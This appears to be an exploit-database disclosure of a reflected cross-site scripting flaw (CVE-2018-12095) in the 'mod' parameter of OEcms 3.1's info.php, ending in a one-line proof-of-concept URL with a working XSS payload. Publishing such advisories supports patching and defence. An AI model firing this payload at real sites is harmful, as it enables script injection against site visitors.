OEcms 3.1 - Cross-Site Scripting
| EKU-ID: 48820 | CVE: CVE-2018-12095 | OSVDB-ID: |
| Author: Renzi | Published: 2018-06-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 48820 | CVE: CVE-2018-12095 | OSVDB-ID: |
| Author: Renzi | Published: 2018-06-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Title: OEcms 3.1 - Cross-Site Scripting # Author: Felipe "Renzi" Gabriel # Date: 2018-06-15 # Software: OEcms v3.1 # CVE: CVE-2018-12095 # Technical Details & Description: # A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application. # The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request. # PoC http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>